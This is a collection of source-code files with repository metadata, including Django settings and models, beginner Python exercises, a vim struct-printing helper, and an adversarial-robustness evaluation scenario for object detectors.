plt.title('orig img')
plt.imshow(train_slice,cmap='gray')
plt.axis('off')
plt.subplot(2, max_val+1, i+2)
if(i==0):
plt.title('intensity fields -->')
plt.imshow(int_slice,cmap='gray')
plt.axis('off')
plt.subplot(2, max_val+1, max_val+1+i+2)
if(i==0):
plt.title('intensity transformed imgs -->')
plt.imshow(y_deformed_slice,cmap='gray')
plt.axis('off')
savefile_name=str(savefile_name_tmp)+'i_'+str(index)+'.png'
plt.savefig(savefile_name)
plt.close('all')
def write_gif_func(self, ip_img, imsize, save_dir,index=0):
'''
To save a gif of the input stack of 2D slices
input params:
ip_img: input stack of 2D slices
imsize: image dimensions
save_dir:directory to save the gif
returns:
None
'''
y = np.squeeze(ip_img)
y_t=np.transpose(y)
recons_ims = np.reshape(y_t,(self.img_size_x*self.img_size_y,self.batch_size))
dataset =np.transpose(recons_ims.reshape(1,imsize[0],imsize[1],recons_ims.shape[1]),[3,0,1,2])
np.expand_dims(dataset, axis=1)
dataset = np.tile(dataset, [1,3,1,1])
imname=save_dir+'plots/test_slice_index_'+str(index)+'.gif'
write_gif((dataset*256).astype(np.uint8), imname, fps=5)
|
[
"LucienSwetschinski@gmail.com"
] |
LucienSwetschinski@gmail.com
|
c4d77d1c78321871c1ca9fb5d7f87495dac2e3e6
|
a4890feb7504837210f8b187f14499382789c2e9
|
/Week 8/Django/mysite/settings.py
|
f4f846ed946e49189768bc05a9dfc964bc5ed798
|
[] |
no_license
|
ExaltedA/Web
|
9cc898d5b85ee0a634958eba0097034ae9bcbce0
|
869a0fe17dbfea023b0bb326367a2472914f51ea
|
refs/heads/master
| 2021-08-09T14:00:23.307171
| 2020-09-11T16:47:54
| 2020-09-11T16:47:54
| 239,846,939
| 0
| 0
| null | 2021-07-14T11:52:23
| 2020-02-11T19:30:31
| null |
UTF-8
|
Python
| false
| false
| 3,190
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.11.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '6y5*gr&#rd#)fbs8tv$g%@1sbh!zts=x2o*1o#acjkuwm@9ml@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'ru-ru'
TIME_ZONE = 'Asia/Almaty'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR,'static')
|
[
"aldie1741@gmail.com"
] |
aldie1741@gmail.com
|
999d447baa7c7fb35500a3e889ad6dcca56dec97
|
2c991e1eb2e81783081e0d788c3ce56205395fe3
|
/armory/scenarios/dapricot_scenario.py
|
3b4b93ab4909a031d48c984af56441b0bfef2c9f
|
[
"MIT"
] |
permissive
|
yusong-tan/armory
|
b086d31a2a2c632766d0e93c7e8483ae2b007826
|
388edde7d85f96dac6a96c13854b955f1bb5c3c3
|
refs/heads/master
| 2023-08-11T05:08:07.126434
| 2022-01-26T18:49:26
| 2022-01-26T18:49:26
| 247,883,491
| 0
| 0
|
MIT
| 2020-03-17T05:02:57
| 2020-03-17T05:02:57
| null |
UTF-8
|
Python
| false
| false
| 5,317
|
py
|
"""
D-APRICOT scenario for object detection in the presence of targeted adversarial patches.
"""
import copy
import logging
from armory.scenarios.scenario import Scenario
from armory.utils import metrics
logger = logging.getLogger(__name__)
class ObjectDetectionTask(Scenario):
def __init__(self, *args, skip_benign=None, **kwargs):
if skip_benign is False:
logger.warning(
"--skip-benign=False is being ignored since the D-APRICOT"
" scenario doesn't include benign evaluation."
)
super().__init__(*args, skip_benign=True, **kwargs)
if self.skip_misclassified:
raise ValueError(
"skip_misclassified shouldn't be set for D-APRICOT scenario"
)
if self.skip_attack:
raise ValueError("--skip-attack should not be set for D-APRICOT scenario.")
def load_attack(self):
attack_config = self.config["attack"]
attack_type = attack_config.get("type")
if not attack_config.get("kwargs").get("targeted", False):
raise ValueError(
"attack['kwargs']['targeted'] must be set to True for D-APRICOT scenario"
)
elif attack_type == "preloaded":
raise ValueError(
"attack['type'] should not be set to 'preloaded' for D-APRICOT scenario "
"and does not need to be specified."
)
elif "targeted_labels" not in attack_config:
raise ValueError(
"attack['targeted_labels'] must be specified, as the D-APRICOT"
" threat model is targeted."
)
elif attack_config.get("use_label"):
raise ValueError(
"The D-APRICOT scenario threat model is targeted, and"
" thus attack['use_label'] should be set to false or unspecified."
)
generate_kwargs = attack_config.get("generate_kwargs", {})
if "threat_model" not in generate_kwargs:
raise ValueError(
"D-APRICOT scenario requires attack['generate_kwargs']['threat_model'] to be set to"
" one of ('physical', 'digital')"
)
elif generate_kwargs["threat_model"].lower() not in ("physical", "digital"):
raise ValueError(
"D-APRICOT scenario requires attack['generate_kwargs']['threat_model'] to be set to"
f"' one of ('physical', 'digital'), not {generate_kwargs['threat_model']}."
)
super().load_attack()
def load_dataset(self):
if self.config["dataset"].get("batch_size") != 1:
raise ValueError(
"dataset['batch_size'] must be set to 1 for D-APRICOT scenario."
)
super().load_dataset()
def load_model(self, defended=True):
model_config = self.config["model"]
generate_kwargs = self.config["attack"]["generate_kwargs"]
if (
model_config["model_kwargs"].get("batch_size") != 3
and generate_kwargs["threat_model"].lower() == "physical"
):
logger.warning(
"If using Armory's baseline mscoco frcnn model,"
" model['model_kwargs']['batch_size'] should be set to 3 for physical attack."
)
super().load_model(defended=defended)
def fit(self, train_split_default="train"):
raise NotImplementedError(
"Training has not yet been implemented for object detectors"
)
def load_metrics(self):
super().load_metrics()
# The D-APRICOT scenario has no non-targeted tasks
self.metrics_logger.adversarial_tasks = []
def run_benign(self):
raise NotImplementedError("D-APRICOT has no benign task")
def run_attack(self):
x, y = self.x, self.y
with metrics.resource_context(name="Attack", **self.profiler_kwargs):
if x.shape[0] != 1:
raise ValueError("D-APRICOT batch size must be set to 1")
# (nb=1, num_cameras, h, w, c) --> (num_cameras, h, w, c)
x = x[0]
y_object, y_patch_metadata = y
generate_kwargs = copy.deepcopy(self.generate_kwargs)
generate_kwargs["y_patch_metadata"] = y_patch_metadata
y_target = self.label_targeter.generate(y_object)
generate_kwargs["y_object"] = y_target
x_adv = self.attack.generate(x=x, **generate_kwargs)
# Ensure that input sample isn't overwritten by model
x_adv.flags.writeable = False
y_pred_adv = self.model.predict(x_adv)
for img_idx in range(len(y_object)):
y_i_target = y_target[img_idx]
y_i_pred = y_pred_adv[img_idx]
self.metrics_logger.update_task(
[y_i_target], [y_i_pred], adversarial=True, targeted=True
)
self.metrics_logger.update_perturbation(x, x_adv)
if self.sample_exporter is not None:
self.sample_exporter.export(x, x_adv, y_object, y_pred_adv)
self.x_adv, self.y_target, self.y_pred_adv = x_adv, y_target, y_pred_adv
def finalize_results(self):
self.metrics_logger.log_task(adversarial=True, targeted=True)
self.results = self.metrics_logger.results()
|
[
"noreply@github.com"
] |
yusong-tan.noreply@github.com
|
e5e814d1049d7599a0c0d9f091966876fda523d5
|
c40030f09958f8d85530e7e6044df926169b48fd
|
/autoload/GenerateShowStructFunction.py
|
188aef1ce22ecd7e3ce3be2b07a0801cc8b21521
|
[
"MIT"
] |
permissive
|
AtsushiSakai/comfortablecpp.vim
|
3232d736a1d3ca09fe4302029b2d887adf7b454f
|
6755133ee52dc21a64eb56ad09db6aa6c91440be
|
refs/heads/master
| 2016-09-16T02:22:53.702201
| 2015-07-31T13:48:38
| 2015-07-31T13:48:38
| 39,666,019
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,317
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
def GenerateShowStructFunction(structstr, separater="\\n"):
structname, memberlist=GenerateStructMetaData(structstr)
#print structname
#print memberlist
showCode=[]
showCode.append("void Show"+structname+"struct(const "+structname+" &obj){")
showCode.append('\tprintf("__func__");')
for member in memberlist:
code='\tprintf("'
code+=member[1]+":%"
typename=member[0]
code+=GetValueFormat(typename)
code+=separater+'");'
showCode.append(code)
showCode.append('}')
#print showCode
return showCode
def GetValueFormat(typename):
valueformat=""
if typename.find("float")!=-1:
valueformat="f"
elif typename.find("double")!=-1:
valueformat="lf"
elif typename.find("char")!=-1 and typename.find("*")!=-1:
valueformat="s"
elif typename.find("char")!=-1:
valueformat="c"
elif typename.find("uint16")!=-1 and typename.find("uint8")!=-1:
valueformat="u"
elif typename.find("unsigned")!=-1 and typename.find("int")!=-1:
valueformat="u"
elif typename.find("unsigned")!=-1 and typename.find("short")!=-1:
valueformat="u"
elif typename.find("short")!=-1 or typename.find("int")!=-1:
valueformat="d"
elif typename.find("int16")!=-1 and typename.find("int8")!=-1:
valueformat="d"
elif typename.find("unsigned")!=-1 and typename.find("long")!=-1:
valueformat="lu"
elif typename.find("uint32")!=-1:
valueformat="lu"
elif typename.find("long")!=-1 or typename.find("int32")!=-1:
valueformat="ld"
else:
valueformat="UNKNOWN"
return valueformat
def GenerateStructMetaData(structstr):
# search space
headerind=structstr.find(" ");
header=structstr[0:headerind];
#print header
# header shoud be "struct"
if header!="struct":
print "Unknown header:"+header
return ""
body=structstr[headerind+1:];
#print body
#get struct name
structnameind=body.find("{");
structname=body[0:structnameind]
structname=structname.strip()
#get content
contentind=body.rfind("}");
content=body[structnameind+1:contentind]
#print structname
#print content
#get struct menber
members=content.split(";")
while members.count("") > 0:
members.remove("")
while members.count("\n") > 0:
members.remove("\n")
#print members
#Get memberlist
memberlist=[];
for member in members:
valueid=member.rfind(" ")
typename=member[0:valueid]
value=member[valueid+1:]
memberlist.append((typename,value))
#print memberlist
return (structname,memberlist)
if __name__ == '__main__':
#============Main Function============
#print __file__+" start!!"
#structstr="struct Sample{int a;unsigned int b;float c;double d;char e;char* fg;short comcom};"
structstr=sys.argv
#print structstr
#GenerateShowStructFunction(structstr,',')
result=GenerateShowStructFunction(structstr)
#print result
#Yank Code
import vim
code=""
for line in result:
code+=line+"\n"
vim.command(":let @*='"+code+"'")
print "Yank ShowStructFunction!"
|
[
"asakai.amsl+github@gmail.com"
] |
asakai.amsl+github@gmail.com
|
b1affac836aea862a8bbbcad81e417c5a613c7a1
|
50ae3a513028299e3c306d31c7dc43c8e428c335
|
/Submissions/Hebah_Qatanany/for loops.py
|
e8ad1dc623c0e5b4d7a1c9f22e9cbdc3b9841736
|
[
"Apache-2.0"
] |
permissive
|
Sinayy/Programming_with_python_2021
|
2022a7d3c906684203b8a4be79fffd662dd2becf
|
0e25caeea3888d89c832d8536ac34e0cf962e371
|
refs/heads/master
| 2022-12-18T11:40:45.142872
| 2020-09-28T14:56:53
| 2020-09-28T14:56:53
| 297,172,986
| 0
| 0
|
Apache-2.0
| 2020-09-28T19:21:00
| 2020-09-20T22:14:16
|
Python
|
UTF-8
|
Python
| false
| false
| 318
|
py
|
print('................................')
print('You can also create some shapes: ')
character = '@'
for i in range(1, 10):
print(character)
print('................................')
print('You can also create some shapes: ')
text = ''
character = '@'
for i in range(1, 10):
text += character
print(text)
|
[
"70976104+hebahq@users.noreply.github.com"
] |
70976104+hebahq@users.noreply.github.com
|
acc09bc88495d5850e4a0886285923a84999db1a
|
d47ff28f502ca52e41537dc1dab54b6ca1916afc
|
/day13.py
|
8ad1be8f75826fee7ac573ad34895bb31cc1240c
|
[
"MIT"
] |
permissive
|
rho2/30DaysOfCode
|
01dc4ee42093e66e185307f7262897c04f4a6040
|
56fe3c584d0b6ae537e3ab3cfcf2387c5455dbea
|
refs/heads/master
| 2020-04-10T22:12:00.146981
| 2017-03-20T16:12:50
| 2017-03-20T16:12:50
| 65,723,691
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 616
|
py
|
from abc import ABCMeta, abstractmethod
class Book(object, metaclass=ABCMeta):
def __init__(self,title,author):
self.title=title
self.author=author
@abstractmethod
def display(): pass
#Write MyBook class
class MyBook(Book):
def __init__(self, title, author, price):
super().__init__(title, author)
self.price = price
def display(self):
print('Title: ' + title)
print('Author: ' + author)
print('Price: ' + str(price))
title=input()
author=input()
price=int(input())
new_novel=MyBook(title,author,price)
new_novel.display()
|
[
"noreply@github.com"
] |
rho2.noreply@github.com
|
2b9535cd7a594fb123bf3b4d10816b52b0158868
|
0ee0d4294f6b95a283f1aa86460a496ac903637b
|
/bin/easy_install-3.6
|
740967bc663b261b6be50597973fd28c57a96fdb
|
[] |
no_license
|
IvanChai1995/DisplayLink-switch
|
f309a5dc09e2f72b205808d4539ffe716fe49082
|
3bda99d8b192b21c1d57020703068477ee9df6ca
|
refs/heads/master
| 2021-04-18T07:16:57.548152
| 2020-03-29T16:51:03
| 2020-03-29T16:51:03
| 249,515,979
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 251
|
6
|
#!/mnt/c/myproject/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"andrushin-sport@mail.ru"
] |
andrushin-sport@mail.ru
|
856aaa5c79a92a8bc4c14be5f933ebfdfff9812f
|
67d0f6bfe81bae6aa32d179de1a3a5f8e14b11d1
|
/extranet/models/student_group.py
|
b60b4d4a1f9422027a91164be1bcbb6e2c1e2fa4
|
[] |
no_license
|
jakubmisiak/wsb-programowanie-obiektowe
|
386e1d36679d2c65cdd3f344a8b9a681e34a3b19
|
5eb46b738fb5c2d72f056dd47721cc7fe7909b65
|
refs/heads/main
| 2023-03-25T20:19:45.577350
| 2020-12-16T21:22:02
| 2020-12-16T21:22:02
| 352,344,593
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
from django.db import models
class StudentGroup(models.Model):
name = models.CharField(max_length=30)
def __str__(self):
return self.name
|
[
"noreply@github.com"
] |
jakubmisiak.noreply@github.com
|
3520556196c6cd0ca5946b1f05cfde549638be00
|
6377cb6658e4f7e4fc702eca93bc308c77cb8dfd
|
/realtorModels.py
|
666247eaf866b12163ecf91f3055c72faf81912c
|
[] |
no_license
|
zhaohonggang/smalldata
|
07f0a2c6e7008f16b8244c43ed6d87ddebc090bc
|
ea981f17ab775534c03310300a1b82c65e0898e2
|
refs/heads/master
| 2021-01-20T03:22:08.717147
| 2018-03-28T13:43:33
| 2018-03-28T13:43:33
| 89,531,443
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,613
|
py
|
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey has `on_delete` set to the desired behavior.
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
from __future__ import unicode_literals
from django.db import models
class Article(models.Model):
article_id = models.BigAutoField(primary_key=True)
article_name = models.CharField(max_length=20)
article_desc = models.TextField()
date_added = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'article'
class CondoSold(models.Model):
id = models.BigAutoField(primary_key=True)
mlsno = models.CharField(unique=True, max_length=100, blank=True, null=True)
status = models.CharField(max_length=100, blank=True, null=True)
stno = models.CharField(max_length=100, blank=True, null=True)
stname = models.CharField(max_length=100, blank=True, null=True)
sttype = models.CharField(max_length=100, blank=True, null=True)
aptno = models.CharField(max_length=100, blank=True, null=True)
city = models.CharField(max_length=100, blank=True, null=True)
area = models.CharField(max_length=100, blank=True, null=True)
askprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
inputdate = models.DateField(blank=True, null=True)
soldprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
solddate = models.DateField(blank=True, null=True)
type = models.CharField(max_length=100, blank=True, null=True)
style = models.CharField(max_length=100, blank=True, null=True)
bdrm = models.IntegerField(blank=True, null=True)
wshrm = models.IntegerField(blank=True, null=True)
maint = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
latitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
longitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
create_date = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'condo_sold'
class House(models.Model):
id = models.BigAutoField(primary_key=True)
address = models.CharField(max_length=1000, blank=True, null=True)
url = models.CharField(max_length=1000, blank=True, null=True)
img = models.CharField(max_length=1000, blank=True, null=True)
price_str = models.CharField(max_length=1000, blank=True, null=True)
mls_number = models.CharField(max_length=1000, blank=True, null=True)
bed_str = models.CharField(max_length=1000, blank=True, null=True)
bath_str = models.CharField(max_length=1000, blank=True, null=True)
property_type = models.CharField(max_length=1000, blank=True, null=True)
building_type = models.CharField(max_length=1000, blank=True, null=True)
land_size = models.CharField(max_length=1000, blank=True, null=True)
storeys = models.CharField(max_length=1000, blank=True, null=True)
salesperson = models.CharField(max_length=1000, blank=True, null=True)
brokerage = models.CharField(max_length=1000, blank=True, null=True)
description = models.CharField(max_length=-1, blank=True, null=True)
create_time = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'house'
class HouseCategory(models.Model):
id = models.BigAutoField(primary_key=True)
name = models.CharField(max_length=100, blank=True, null=True)
en = models.CharField(max_length=500, blank=True, null=True)
cn = models.CharField(max_length=500, blank=True, null=True)
class Meta:
managed = False
db_table = 'house_category'
class HouseForSale(models.Model):
id = models.BigIntegerField(primary_key=True)
mlsno = models.CharField(unique=True, max_length=100, blank=True, null=True)
status = models.CharField(max_length=100, blank=True, null=True)
stno = models.CharField(max_length=100, blank=True, null=True)
stname = models.CharField(max_length=100, blank=True, null=True)
sttype = models.CharField(max_length=100, blank=True, null=True)
aptno = models.CharField(max_length=100, blank=True, null=True)
city = models.CharField(max_length=100, blank=True, null=True)
area = models.CharField(max_length=100, blank=True, null=True)
askprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
inputdate = models.DateField(blank=True, null=True)
soldprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
solddate = models.DateField(blank=True, null=True)
type = models.CharField(max_length=100, blank=True, null=True)
style = models.CharField(max_length=100, blank=True, null=True)
bdrm = models.IntegerField(blank=True, null=True)
wshrm = models.IntegerField(blank=True, null=True)
maint = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
latitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
longitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
create_date = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'house_for_sale'
class HouseSold(models.Model):
id = models.BigIntegerField(primary_key=True)
mlsno = models.CharField(unique=True, max_length=100, blank=True, null=True)
status = models.CharField(max_length=100, blank=True, null=True)
stno = models.CharField(max_length=100, blank=True, null=True)
stname = models.CharField(max_length=100, blank=True, null=True)
sttype = models.CharField(max_length=100, blank=True, null=True)
aptno = models.CharField(max_length=100, blank=True, null=True)
city = models.CharField(max_length=100, blank=True, null=True)
area = models.CharField(max_length=100, blank=True, null=True)
askprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
inputdate = models.DateField(blank=True, null=True)
soldprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
solddate = models.DateField(blank=True, null=True)
type = models.CharField(max_length=100, blank=True, null=True)
style = models.CharField(max_length=100, blank=True, null=True)
bdrm = models.IntegerField(blank=True, null=True)
wshrm = models.IntegerField(blank=True, null=True)
maint = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
latitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
longitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
create_date = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'house_sold'
class HouseSoldBak(models.Model):
id = models.BigIntegerField(blank=True, null=True)
mlsno = models.CharField(max_length=100, blank=True, null=True)
status = models.CharField(max_length=100, blank=True, null=True)
stno = models.CharField(max_length=100, blank=True, null=True)
stname = models.CharField(max_length=100, blank=True, null=True)
sttype = models.CharField(max_length=100, blank=True, null=True)
city = models.CharField(max_length=100, blank=True, null=True)
area = models.CharField(max_length=100, blank=True, null=True)
askprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
inputdate = models.DateField(blank=True, null=True)
soldprice = models.DecimalField(max_digits=18, decimal_places=4, blank=True, null=True)
solddate = models.DateField(blank=True, null=True)
type = models.CharField(max_length=100, blank=True, null=True)
style = models.CharField(max_length=100, blank=True, null=True)
bdrm = models.IntegerField(blank=True, null=True)
wshrm = models.IntegerField(blank=True, null=True)
latitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
longitude = models.DecimalField(max_digits=18, decimal_places=14, blank=True, null=True)
create_date = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'house_sold_bak'
|
[
"zhaohonggang@yahoo.com"
] |
zhaohonggang@yahoo.com
|
8a61dfaf9fdc2a7c8a75310bc6c02de1f7d6da31
|
2099a076de21d5d08e07d1675fad1184ee46c2fb
|
/archstart/hello.py
|
8e5a11a909cc10695d6e2bb56e4dee75e1e944fe
|
[
"MIT"
] |
permissive
|
jacobjhansen/archstart
|
6db98cd715ad934f13426882a663707202d197c2
|
959301b71dbbe534c736e133dcd60199494819af
|
refs/heads/master
| 2023-04-12T15:13:27.980744
| 2021-04-30T14:46:53
| 2021-04-30T14:46:53
| 345,779,846
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 85
|
py
|
import getpass
def say_hello():
print("Hello, {} =)".format(getpass.getuser()))
|
[
"jjhansen1999@gmail.com"
] |
jjhansen1999@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.